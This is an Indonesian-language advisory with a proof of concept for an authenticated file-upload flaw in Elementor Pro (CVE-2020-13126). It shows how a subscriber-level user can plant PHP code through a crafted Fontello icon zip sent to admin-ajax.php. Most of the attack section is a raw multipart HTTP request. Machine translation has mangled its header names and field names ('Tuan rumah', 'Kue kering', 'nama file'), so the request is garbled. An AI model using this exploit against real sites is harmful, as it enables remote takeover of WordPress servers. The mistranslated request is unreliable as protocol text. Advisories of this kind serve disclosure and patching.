Elementor Pro < 2.9.4 - Unggah File Sewenang-wenang RCE (Remote Code Execution) yang Diautentikasi
Kerentanan, yang saat ini dieksploitasi oleh penyerang, memungkinkan setiap pengguna yang masuk untuk mengunggah dan menjalankan skrip PHP di blog dan bahwa ini mempengaruhi plugin Element Pro, bukan versi gratis(free)
Kerentanan ini digunakan bersama dengan kerentanan di Ultimate Addons for Elementor yang memungkinkan pendaftaran pelanggan.
BUKTI KONSEP
Berikut ini adalah contoh posting di mana zip_upload dapat berisi file zip yang dihasilkan fontello dengan file php yang disuntikkan. Nonce yang sah dapat diambil dari sumber halaman /wp-admin setelah diautentikasi sebagai pelanggan untuk bidang _nonce.
POST /wp-admin/admin-ajax.php HTTP/1.1 Tuan rumah: Konten-Panjang: 38005 Terima: aplikasi/json, teks/javascript, */*; q=0,01 X-Diminta-Dengan: XMLHttpRequest Agen-Pengguna: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/81.0.4044.113 Safari/537.36 Content-Type: multipart/form-data; batas=----WebKitFormBoundaryczB4AfBdfz6AZDaF Asal: http://elementorvuln.vhx.cloud:8080 Referensi: [url]/wp-admin/post-new.php?post_type=elementor_icons Terima-Encoding: gzip, deflate Bahasa Terima: en-US,en;q=0.9 Kue kering: Koneksi: tutup ------WebKitFormBoundaryczB4AfBdfz6AZDaF Isi-Disposisi: formulir-data; nama="zip_upload"; nama file="fontello-c6dc39d0.zip" Tipe Konten: aplikasi/zip **menghilangkan ini untuk singkatnya*** ------WebKitFormBoundaryczB4AfBdfz6AZDaF Isi-Disposisi: formulir-data; nama="tindakan" {"pro_assets_manager_custom_icon_upload":{"action":"pro_assets_manager_custom_icon_upload","data":{"post_id":"1"}}} ------WebKitFormBoundaryczB4AfBdfz6AZDaF Isi-Disposisi: formulir-data; nama="_nonce" 5052d6f053 ------WebKitFormBoundaryczB4AfBdfz6AZDaF Isi-Disposisi: formulir-data; nama = "tindakan" elementor_ajax ------WebKitFormBoundaryczB4AfBdfz6AZDaF———
Klasifikasi
JenisRCE
10 besar OWASPCVE-2020-13126
0 Komentar